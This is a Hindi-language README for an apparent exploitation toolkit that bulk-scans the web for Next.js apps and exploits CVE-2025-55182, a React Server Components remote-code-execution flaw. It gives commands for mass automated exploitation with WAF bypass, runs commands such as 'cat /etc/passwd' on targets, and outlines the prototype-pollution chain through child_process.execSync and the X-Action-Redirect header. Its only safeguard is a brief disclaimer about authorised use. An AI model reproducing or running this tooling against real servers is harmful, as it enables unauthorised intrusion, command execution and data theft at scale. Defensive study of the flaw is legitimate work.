
Next.js React Server Components रिमोट कोड एक्ज़ीक्यूशन भेद्यता (CVE-2025-55182) के परीक्षण के लिए एक व्यापक सुरक्षा अनुसंधान उपकरण।
यह टूलकिट CVE-2025-55182 के लिए स्वचालित पहचान और शोषण क्षमताएँ प्रदान करता है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों को प्रभावित करने वाली एक गंभीर RCE भेद्यता है। टूलकिट में तीन एकीकृत घटक शामिल हैं:
requests लाइब्रेरीpip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
लक्ष्यों को स्कैन और शोषण करने का सबसे तेज़ तरीका:
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt
# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"
शोषण के बिना Next.js अनुप्रयोगों की पहचान करें:
python3 NextApp.py targets.txt
आउटपुट फ़ाइलें:
confirmed_nextjs_targets.txt - सभी पहचाने गए Next.js अनुप्रयोगhigh_confidence_nextjs_targets.txt - केवल उच्च-कॉन्फिडेंस पहचानव्यक्तिगत लक्ष्यों का परीक्षण करें:
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"
# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt
# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
तर्क:
targets_file - लक्ष्य URL वाली टेक्स्ट फ़ाइल (प्रति पंक्ति एक)./exploit.sh [OPTIONS]
विकल्प:
./auto_exploit.sh [OPTIONS]
विकल्प:
NextApp.py द्वारा उत्पन्न - इसमें वे सभी URL शामिल हैं जिन्हें Next.js अनुप्रयोगों के रूप में पहचाना गया है।
NextApp.py द्वारा उत्पन्न - इसमें केवल उच्च-कॉन्फिडेंस Next.js पहचान (100+ कॉन्फिडेंस स्कोर) शामिल हैं।
auto_exploit.sh द्वारा उत्पन्न - व्यापक शोषण रिपोर्ट जिसमें शामिल हैं:
स्कैनर एक कॉन्फिडेंस स्कोरिंग प्रणाली के साथ कई पहचान तकनीकों का उपयोग करता है:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ उपस्थिति (100 अंक)_next/* एसेट पथ (मात्रा के आधार पर 25-75 अंक)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTकॉन्फिडेंस सीमाएँ:
यह शोषण Next.js React Server Components में एक प्रोटोटाइप प्रदूषण श्रृंखला का लाभ उठाता है:
__proto__ श्रृंखला को प्रदूषित करता है_response._prefix में मनमाना JavaScript इंजेक्ट करता हैprocess.mainModule.require('child_process').execSync() के माध्यम से कमांड निष्पादित करता हैX-Action-Redirect हेडर से परिणाम निकालता हैटूलकिट में अंतर्निहित WAF बायपास क्षमताएँ शामिल हैं:
-w या --waf-bypass फ्लैग के साथ सक्षम करें।
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Check results
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Step 1: Detect and filter
python3 NextApp.py targets.txt
# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ताओं को:
कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस उपकरण के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।
उन सुरक्षा शोधकर्ताओं का धन्यवाद जिन्होंने इस भेद्यता की खोज और खुलासा किया:
योगदान का स्वागत है! कृपया:
समस्याओं, प्रश्नों या फीचर अनुरोधों के लिए, कृपया GitHub पर एक issue खोलें।
यह प्रोजेक्ट शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। जिम्मेदारी और नैतिक रूप से उपयोग करें।
| Option | Description | Default |
|---|
-d, --domain | लक्ष्य डोमेन/URL | http://localhost:3000 |
-f, --file | लक्ष्य सूची वाली फ़ाइल | - |
-c, --command | निष्पादित करने के लिए कमांड | id |
-w, --waf-bypass | WAF बायपास सक्षम करें | अक्षम |
--waf-size SIZE | WAF बायपास डेटा आकार (KB) | 128 |
--timeout SECONDS | अनुरोध टाइमआउट | 15 |
-k, --insecure | SSL सत्यापन छोड़ें | अक्षम |
--user-agent AGENT | कस्टम User-Agent | Mozilla/5.0... |
-h, --help | सहायता संदेश दिखाएँ | - |
| Option | Description | Default |
|---|
-i, --input FILE | इनपुट लक्ष्य फ़ाइल | confirmed_nextjs_targets.txt |
-o, --output FILE | आउटपुट परिणाम फ़ाइल | exploit_results.txt |
-c, --command CMD | निष्पादित करने के लिए कमांड | id |
-w, --waf-bypass | WAF बायपास सक्षम करें | अक्षम |
--waf-size SIZE | WAF बायपास आकार (KB) | 128 |
--timeout SECONDS | अनुरोध टाइमआउट | 15 |
-k, --insecure | SSL सत्यापन छोड़ें | अक्षम |
--delay SECONDS | अनुरोधों के बीच देरी | 2 |
-s, --scan | पहले Next.js के लिए ऑटो-स्कैन करें | अक्षम |
-h, --help | सहायता संदेश दिखाएँ | - |